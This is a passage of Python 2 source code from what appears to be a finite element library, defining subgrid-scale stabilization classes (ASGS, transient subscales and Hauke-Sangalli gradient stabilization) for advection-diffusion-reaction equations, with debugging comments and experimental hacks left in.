self.mesh = mesh
self.nc = nc
self.nd = nd
def calculateSubgridError(self,q):
nc = self.nc
for ci in range(self.nc):
vfemIntegrals.calculateSubgridErrorScalarADR_1(self.mesh.elementDiametersArray,
q[('df',ci,nc-1-ci)],
q[('a',ci,nc-1-ci)],
q[('da',ci,nc-1-ci,nc-1-ci)],
q[('grad(phi)',nc-1-ci)],
q[('dphi',nc-1-ci,nc-1-ci)],
q[('dr',ci,nc-1-ci)],
q[('dmt',ci,nc-1-ci)],
q[('pe',ci)],
q[('cfl',ci)],
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,nc-1-ci)],
q[('subgridError',ci)],
q[('dsubgridError',ci,nc-1-ci)])
class AdvectionDiffusionReactionTransientSubscales_ASGS(AdvectionDiffusionReaction_ASGS):
"""
track subgrid scales in time with Backward Euler
\delta u^{n+1} = -\tau_t\tilde{R}_h
\tilde{R}_h = R_h - m^{\prime,k}\frac{\delta u^{n}}{\Delta t^{n+1}}
\tau_t = \frac{\Delta t^{n+1}\tau_s}{m^{prime,n+1}\tau_s + \Delta t^{n+1}}
\tau_s = normal spatial tau, supposed to have \tau_s \approx \mathcal{L}^{-1}_{s}
for now m^{prime} evaluated at k=n for subgrid error but not sure if this is right or not
TODO:
Check Peclet number calculation in generic tau and cfl calculation, what's returned in cfl array
(advective or max of advective,diffusive stab. constraint)
FLCBDF seems less happy with tracking subgrid scales than without tracking
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,trackSubScales=False,useHarariDirectly=False,
limit_tau_t=False,tau_t_limit_min=0.0,tau_t_limit_max=1.0):
AdvectionDiffusionReaction_ASGS.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag)
self.trackSubScales=trackSubScales
self.timeIntegration = None
self.useHarariDirectly = useHarariDirectly
#apply bounds to tau_t?
self.limit_tau_t = limit_tau_t
self.tau_t_limit_min = tau_t_limit_min
self.tau_t_limit_max = tau_t_limit_max
def initializeElementQuadrature(self,mesh,t,cq):
AdvectionDiffusionReaction_ASGS.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.subgridError_last=[]
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def updateSubgridErrorHistory(self,initializationPhase=False):
AdvectionDiffusionReaction_ASGS.updateSubgridErrorHistory(self,initializationPhase=initializationPhase)
if self.trackSubScales:
for ci in range(self.nc):
if not initializationPhase:
#we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#mwf debug
logEvent("ADR_ASGS tracksubscales updateSubgridErrorHistory max subgridError = %s " % (self.subgridError_last[ci].max()),10)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
def calculateSubgridError(self,q):
for ci in range(self.nc):
#mwf need to calculate tau_s without dm/dt
mttmp = q[('dmt',ci,ci)]
if self.trackSubScales:
self.subgridTmp[ci].fill(0.0)
mttmp = self.subgridTmp[ci]
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
mttmp,
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
mttmp,
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
#dm_subgrid = self.subgridErrorMassCoef_last[ci]
else:
tau=self.tau[ci]
#dm_subgrid = q[('dm',ci,ci)]
dm_subgrid = self.cq[('dm_sge',ci,ci)]
#mwf debug
#import pdb
#pdb.set_trace()
if self.trackSubScales:
#mwf debug
logEvent("ADR_ASGS trackScales before transient modficication (tau_s) tau[ci].max= %s tau[ci].min=%s " % (tau[ci].max(),tau[ci].min()),10)
#tau here should be the same as tau_t in Codina's formalism if dmdt is included?
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide what time level to use
q[('pdeResidual',ci)] -= self.subgridTmp[ci] #R_h --> \tilde{R}_h
if tau.max() > 0.0:
#mwf debug
#import pdb
#pdb.set_trace()
self.subgridTmp[ci][:] = tau
self.subgridTmp[ci] *= dt
self.subgridTmp2[ci][:] = tau
self.subgridTmp2[ci] *= dm_subgrid
self.subgridTmp2[ci] += dt
self.subgridTmp[ci] /= self.subgridTmp2[ci]
if self.coefficients.sd and self.useHarariDirectly:
csubgridError.calculateSubgridError_Harari_tau_sd(self.nd,dt,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('a',ci,ci)],
self.subgridTmp[ci])
#bound tau_t based on dt size
if self.limit_tau_t:
numpy.clip(self.subgridTmp[ci],self.tau_t_limit_min*dt,self.tau_t_limit_max*dt,self.subgridTmp[ci])
tau = self.subgridTmp[ci]
#mwf debug
logEvent("ADR_ASGS trackScales after modifying tau[ci].max= %s tau[ci].min= %s " % (tau[ci].max(),tau[ci].min()),10)
#mwf should be 1.0/m'
assert tau.max() * dm_subgrid.max() /dt <= 1.0, "Subgrid scales, modified tau_t.max() = %s dt = %s dm_subgrid.max() = %s tau.m'/dt = %s must be less than 1 " % (tau.max(),
dt,
dm_subgrid.max(),
tau.max()/dt)
#
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
#mwf debug
logEvent("ADR_ASGS pdeResidual[ci].max = %s subgridError.max = %s subgridError.min= %s " % (q[('pdeResidual',ci)].max(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),10)
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
\delta m^{n}/\delta t^{n+1}
"""
if self.trackSubScales:
for ci in range(self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide how to approximate
logEvent("ADR trackSubScales accumulating delta u^n.abs.max= %s dm.max=%s " % (max(numpy.absolute(self.subgridTmp[ci].flat)),
max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),10)
q[('mt',ci)] -= self.subgridTmp[ci]
class AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS(SGE_base):
"""
Should be basic Hauke Sangalli approach but computes terms at interpolation points
and then uses this to compute the gradient for Sangalli type approach
Adjoint gradient is computed manually
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,interpolationFemSpaceType=None,tau_00_force=None,
tau_11_force=None):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.interpolationFemSpaceType = interpolationFemSpaceType
assert self.interpolationFemSpaceType != None
self.usesFEMinterpolant = True
self.usesGradientStabilization = True
self.tau_00_force=tau_00_force; self.tau_11_force = tau_11_force
def initializeElementQuadrature(self,mesh,t,cq,cip=None):
"""
"""
SGE_base.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.cq=cq
self.cip=cip
assert self.cip != None
self.tau_gradient = []
self.tau_gradient_last = []
self.subgridTmp = [];
self.subgridTmp_ip = [];
self.grad_u_last = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.grad_u_last.append(numpy.zeros(cq[('grad(u)',ci)].shape,'d'))
if self.lag:
if cip.has_key(('df',ci,ci)):
cip[('df_sge',ci,ci)] = copy.deepcopy(cip[('df',ci,ci)])
if cip.has_key(('dm',ci,ci)):
cip[('dm_sge',ci,ci)] = copy.deepcopy(cip[('dm',ci,ci)])
if cip.has_key(('dmt',ci,ci)):
cip[('dmt_sge',ci,ci)] = copy.deepcopy(cip[('dmt',ci,ci)])
#
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = copy.deepcopy(cq[('df',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cip.has_key(('df',ci,ci)):
cip[('df_sge',ci,ci)] = cip[('df',ci,ci)]
if cip.has_key(('dm',ci,ci)):
cip[('dm_sge',ci,ci)] = cip[('dm',ci,ci)]
if cip.has_key(('dmt',ci,ci)):
cip[('dmt_sge',ci,ci)] = cip[('dmt',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
#
if self.lag:#mwf looks like this was missing if lag May 7 09
cip[('grad(phi)_sge',ck)]=copy.deepcopy(cip[('grad(phi)',ck)])
for cj in cjDict.keys():
cip[('dphi_sge',ck,cj)]=copy.deepcopy(cip[('dphi',ck,cj)])
cip[('da_sge',ci,ck,cj)]=copy.deepcopy(cip[('da',ci,ck,cj)])
#
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
cip[('grad(phi)_sge',ck)]=cip[('grad(phi)',ck)]
for cj in cjDict.keys():
cip[('dphi_sge',ck,cj)]=cip[('dphi',ck,cj)]
cip[('da_sge',ci,ck,cj)]=cip[('da',ci,ck,cj)]
#
self.interpolationSpace = {}; self.strongResidualInterpolant = {};
if self.interpolationFemSpaceType != None:
for ci in range(self.nc):
self.interpolationSpace[ci] = self.interpolationFemSpaceType(self.mesh.subdomainMesh,self.nd)
self.strongResidualInterpolant[ci] = FemTools.FiniteElementFunction(self.interpolationSpace[ci])
if self.usesGradientStabilization == True:
for ci in range(self.nc):
cq[('grad(pdeResidual)',ci)]= numpy.zeros(cq[('grad(u)',ci)].shape,'d')
cq[('grad(subgridError)',ci)]= numpy.zeros(cq[('grad(u)',ci)].shape,'d')
#mwf hack just make a scalar to test Jacobian
for cj in range(self.nc):
cq[('dgrad(subgridError)',ci,cj)]= numpy.zeros(cq[('u',ci)].shape,'d')
self.tau_gradient.append(numpy.zeros(self.tau[ci].shape,'d'))
if self.lag:
self.tau_gradient_last.append(numpy.zeros(self.tau_last[ci].shape,'d'))
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def calculateSubgridErrorInterpolants(self,ci):
"""
should interpolate strong residual. One problem is that
strong residual is discontinuous when grad(u) terms are nonzero
so standard C0 projection
won't necessarily be what we expect locally on each element
for C0, P1 and linear problem with constant coefficients
computing gradient locally should be just the same as
ignoring gradient terms altogether
"""
#mwf debug
#import pdb
#pdb.set_trace()
#now project to finite element space
if self.usesGradientStabilization:
#mwf hack!
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('pdeResidual',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('mt',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('m',ci)]/self.timeIntegration.dt)
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('r',ci)])
self.subgridTmp_ip[ci].fill(0.0)
if self.cip.has_key(('mt',ci)):
self.subgridTmp_ip[ci] += self.cip[('mt',ci)]
if self.cip.has_key(('r',ci)):
self.subgridTmp_ip[ci] += self.cip[('r',ci)]
self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.subgridTmp_ip[ci])
def calculateSubgridError(self,q):
#compute basic ASGS stabilization as before
for ci in range(self.nc):
self.calculateSubgridErrorInterpolants(ci)
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci],
self.tau_gradient[ci])
else:
assert False
if self.lag:
tau=self.tau_last[ci]
tau_gradient=self.tau_gradient_last[ci]
#have to figure out way to update dmt_sge if lagging
else:
tau=self.tau[ci]
tau_gradient = self.tau_gradient[ci]
#mwf hack ...
if self.coefficients.sd and False:
logEvent("HaukeSangalli Hack switching from tau.max()= %s tau.min()= %s to " % (tau[ci].max(),tau[ci].min()),1)
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
tau = self.tau[ci]
logEvent("Generic tau is tau.max() =%s tau.min() = %s to " % (tau[ci].max(),tau[ci].min()),1)
#mwf hack
if self.tau_00_force != None:
tau.fill(self.tau_00_force)
if self.tau_11_force != None:
tau_gradient.fill(self.tau_11_force)
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
for ci in range(self.nc):
#mwf debug
#import pdb
#pdb.set_trace()
#this is the general way but right now we're having a problem when we interpolate
#the actual residual because of the discontinuous gradient terms
self.strongResidualInterpolant[ci].getGradientValues(q[('grad(v)',ci)],
q[('grad(pdeResidual)',ci)])
#mwf hack to test calculation
q[('grad(pdeResidual)',ci)].flat[:] = q[('grad(u)',ci)].flat
q[('grad(pdeResidual)',ci)] -= self.grad_u_last[ci]
q[('grad(pdeResidual)',ci)] /= self.timeIntegration.dt
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridErrorGradient_tauRes(tau_gradient,
q[('grad(pdeResidual)',ci)],
q[('grad(subgridError)',ci)])
#have got to come up with way to handle jacobian
q[('dgrad(subgridError)',ci,cj)].flat[:] = q[('dmt',ci,cj)].flat
q[('dgrad(subgridError)',ci,cj)] += q[('dr',ci,cj)]
self.subgridTmp[ci].flat[:] = q[('dmt_sge',ci,cj)].flat
self.subgridTmp[ci] += q[('dr',ci,cj)]
q[('dgrad(subgridError)',ci,cj)] *= self.subgridTmp[ci]
q[('dgrad(subgridError)',ci,cj)] *= tau_gradient
q[('dgrad(subgridError)',ci,cj)] *= -1.0
#below works for just dmt approx for residual
# q[('dgrad(subgridError)',ci,cj)].flat[:] = tau_gradient.flat
# q[('dgrad(subgridError)',ci,cj)] *= -1.0
# q[('dgrad(subgridError)',ci,cj)] *= q[('dmt_sge',ci,cj)]
# q[('dgrad(subgridError)',ci,cj)] *= q[('dmt',ci,cj)]
logEvent("HaukeSangalli ADR tau_00.max() = %s tau_11.max() = %s grad(pdeResidual).max= %s grad(subgridError).max= %s dgrad(subgridError).max= %s " % (tau.max(),tau_gradient.max(),
q[('grad(pdeResidual)',ci)].max(),
q[('grad(subgridError)',ci)].max(),
q[('dgrad(subgridError)',ci,ci)].max()),1)
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.tau_gradient_last[ci][:] = self.tau_gradient[ci]
self.cip[('df_sge',ci,ci)][:] = self.cip[('df',ci,ci)]
self.cip[('dm_sge',ci,ci)][:] = self.cip[('dm',ci,ci)]
#
self.cq[('df_sge',ci,ci)][:] = self.cq[('df',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cip[('grad(phi)_sge',ck)][:]=self.cip[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cip[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cip[('da_sge',ci,ck,cj)][:]=self.cip[('da',ci,ck,cj)]
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
#
#
#mwf hack to test
self.grad_u_last[ci].flat[:] = self.cq[('grad(u)',ci)].flat
#
class AdvectionDiffusionReactionHaukeSangalliInterpolantWithTransientSubScales_ASGS(AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS):
"""
Should be basic Hauke Sangalli approach but computes terms at interpolation points
and then uses this to compute the gradient for Sangalli type approach
Adjoint gradient is computed manually
And SubScales are tracked in time
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,interpolationFemSpaceType=None,trackSubScales=False,tau_00_force=None,
tau_11_force=None,includeSubgridScalesInGradientStabilization=True):
AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.__init__(self,coefficients,nd,lag,
interpolationFemSpaceType=interpolationFemSpaceType,tau_00_force=tau_00_force,
tau_11_force=tau_11_force)
self.trackSubScales = trackSubScales
self.includeSubgridScalesInGradientStabilization = includeSubgridScalesInGradientStabilization
def initializeElementQuadrature(self,mesh,t,cq,cip=None):
"""
"""
AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.initializeElementQuadrature(self,mesh,t,cq,cip)
import copy
self.subgridError_last=[]
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
self.subgridError_ip_last=[]
self.subgridErrorMassCoef_ip_last = []
self.subgridTmp_ip = []; self.subgridTmp2_ip = []
self.tau_ip = [] ; self.tau_ip_last = []
self.tau_gradient_ip = [] ; self.tau_gradient_ip_last = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
#
self.subgridError_ip_last.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_ip_last.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.subgridTmp2_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.tau_ip.append(copy.deepcopy(self.tau[ci]))
self.tau_gradient_ip.append(copy.deepcopy(self.tau_gradient[ci]))
if self.lag:
self.tau_ip_last.append(copy.deepcopy(self.tau_last[ci]))
self.tau_gradient_ip_last.append(copy.deepcopy(self.tau_gradient_last[ci]))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
self.subgridError_ip_last.append(None)
self.subgridErrorMassCoef_ip_last.append(None)
def calculateSubgridErrorInterpolants(self,ci):
#mwf debug
#import pdb
#pdb.set_trace()
#now project to finite element space
hack = False
if self.usesGradientStabilization:
if hack:#mwf hack!
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('pdeResidual',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('mt',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('m',ci)]/self.timeIntegration.dt)
self.subgridTmp_ip[ci].flat[:] = self.cip[('m',ci)]
self.subgridTmp_ip[ci] /= self.timeIntegration.dt
else:
self.subgridTmp_ip[ci].fill(0.0)
if self.cip.has_key(('mt',ci)):
self.subgridTmp_ip[ci] += self.cip[('mt',ci)]
if self.cip.has_key(('r',ci)):
self.subgridTmp_ip[ci] += self.cip[('r',ci)]
if self.includeSubgridScalesInGradientStabilization:
#unless accumulate subgrid term has been callled this will miss old subgrid mass
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp2_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp2_ip[ci] *= dtInv
self.subgridTmp2_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
logEvent("HaukeSangalli pdeResidualInterpolant accumulating subgridHistory dt=%s subgridError_ip_last.max=%s subgridError_ip_last.min=%s " % (dt,
self.subgridError_ip_last[ci].max(),
self.subgridError_ip_last[ci].min()),1)
#should be -=
self.subgridTmp_ip[ci] -= self.subgridTmp2_ip[ci]
#
self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.subgridTmp_ip[ci])
def calculateSubgridError(self,q):
#calculate tau's
for ci in range(self.nc):
#calculate interpolant here if want gradient stabilization to be for R_h instead of \tilde{R}_h
if not self.includeSubgridScalesInGradientStabilization:
self.calculateSubgridErrorInterpolants(ci)
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci],
self.tau_gradient[ci])
else:
assert False
if self.lag:
tau=self.tau_last[ci]
tau_gradient=self.tau_gradient_last[ci]
else:
tau=self.tau[ci]
tau_gradient = self.tau_gradient[ci]
if self.trackSubScales:
#Repeat for interpolation points
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.cip['inverse(J)'],
self.cip[('dmt',ci,ci)],
self.cip[('df',ci,ci)],
self.cip[('a',ci,ci)],
self.cip[('da',ci,ci,ci)],
self.cip[('grad(phi)',ci)],
self.cip[('dphi',ci,ci)],
self.cip[('dr',ci,ci)],
self.cip[('pe',ci)],
self.cip[('cfl',ci)],
self.tau_ip[ci],
self.tau_gradient_ip[ci])
else:
assert False
if self.lag:
tau_ip=self.tau_ip_last[ci]
tau_gradient_ip=self.tau_gradient_ip_last[ci]
else:
tau_ip=self.tau[ci]
tau_gradient_ip = self.tau_gradient_ip[ci]
#mwf hack
if self.tau_00_force != None:
tau.fill(self.tau_00_force)
if self.trackSubScales: tau_ip.fill(self.tau_00_force)
if self.tau_11_force != None:
tau_gradient.fill(self.tau_11_force)
if self.trackSubScales: tau_gradient_ip.fill(self.tau_11_force)
#mwf debug
#import pdb
#pdb.set_trace()
if self.trackSubScales:
#mwf debug
print "HaukeSangalli_ASGS trackScales tau[ci].max= %s " % (tau[ci].max())
#
#would be nice to have dt^{n+1} alone, try to get this from timeIntegration directly?
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp[ci][:] = self.subgridError_last[ci]
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#figure this out
q[('pdeResidual',ci)] -= self.subgridTmp[ci] #R_h --> \tilde{R}_h
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp_ip[ci] *= dtInv
self.subgridTmp_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
self.cip[('pdeResidual',ci)] -= self.subgridTmp_ip[ci] #R_h --> \tilde{R}_h
#
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
if self.trackSubScales:
for cj in range(self.nc):
if self.cip.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau_ip,
self.cip[('pdeResidual',ci)],
self.cip[('dpdeResidual',ci,cj)],
self.cip[('subgridError',ci)],
self.cip[('dsubgridError',ci,cj)])
logEvent("HaukeSangalli cip.subgridError.max=%s cip.subgridError.min=%s cq.subgridError.max=%s cq.subgridError.min=%s " % (self.cip[('subgridError',ci)].max(),
self.cip[('subgridError',ci)].min(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),1)
#computing interpolant here will pick up \tilde{R}_h
if self.includeSubgridScalesInGradientStabilization:
#have to make sure interpolant has subgrid history update too
self.calculateSubgridErrorInterpolants(ci)
#mwf debug
#import pdb
#pdb.set_trace()
self.strongResidualInterpolant[ci].getGradientValues(q[('grad(v)',ci)],
q[('grad(pdeResidual)',ci)])
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridErrorGradient_tauRes(tau_gradient,
q[('grad(pdeResidual)',ci)],
q[('grad(subgridError)',ci)])
#have got to come up with way to handle jacobian
q[('dgrad(subgridError)',ci,cj)].flat[:] = q[('dmt',ci,cj)].flat
q[('dgrad(subgridError)',ci,cj)] += q[('dr',ci,cj)]
self.subgridTmp[ci].flat[:] = q[('dmt_sge',ci,cj)].flat
self.subgridTmp[ci] += q[('dr',ci,cj)]
q[('dgrad(subgridError)',ci,cj)] *= self.subgridTmp[ci]
q[('dgrad(subgridError)',ci,cj)] *= tau_gradient
q[('dgrad(subgridError)',ci,cj)] *= -1.0
#below works for just dmt approx for residual
#q[('dgrad(subgridError)',ci,cj)].flat[:] = tau_gradient.flat
#q[('dgrad(subgridError)',ci,cj)] *= -1.0
#q[('dgrad(subgridError)',ci,cj)] *= q[('dmt_sge',ci,cj)]
#q[('dgrad(subgridError)',ci,cj)] *= q[('dmt',ci,cj)]
#
logEvent("HaukeSangalli pdeResidual[ci].max = %s subgridError.max = %s subgridError.min= %s " % (q[('pdeResidual',ci)].max(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),1)
logEvent("HaukeSangalliTrackSubScales ADR tau_00.max() = %s tau_11.max() = %s grad(pdeResidual).max= %s grad(subgridError).max= %s dgrad(subgridError).max= %s " % (tau.max(),tau_gradient.max(),
q[('grad(pdeResidual)',ci)].max(),
q[('grad(subgridError)',ci)].max(),
q[('dgrad(subgridError)',ci,ci)].max()),1)
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
def updateSubgridErrorHistory(self,initializationPhase=False):
AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.updateSubgridErrorHistory(self,initializationPhase)
if self.trackSubScales:
for ci in range(self.nc):
if not initializationPhase:
#mwf I believe we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#
self.subgridError_ip_last[ci].flat[:] = self.cip[('subgridError',ci)].flat
self.subgridError_ip_last[ci] *= -1.0
#mwf debug
logEvent("HaukeSangalliTrackSubScales ADR tracksubscales updateSubgridErrorHistory max subgridError = %s at ip max= %s " % (self.subgridError_last[ci].max(),
self.subgridError_ip_last[ci].max()),1)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
self.subgridErrorMassCoef_ip_last[ci].flat[:] = self.cip[('dm',ci,ci)].flat
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
\delta m^{n}/\delta t^{n+1}
"""
if self.trackSubScales:
#mwf debug
#import pdb
#pdb.set_trace()
for ci in range(self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
#would be nice to have dt^{n+1} alone
dt = self.timeIntegration.dt
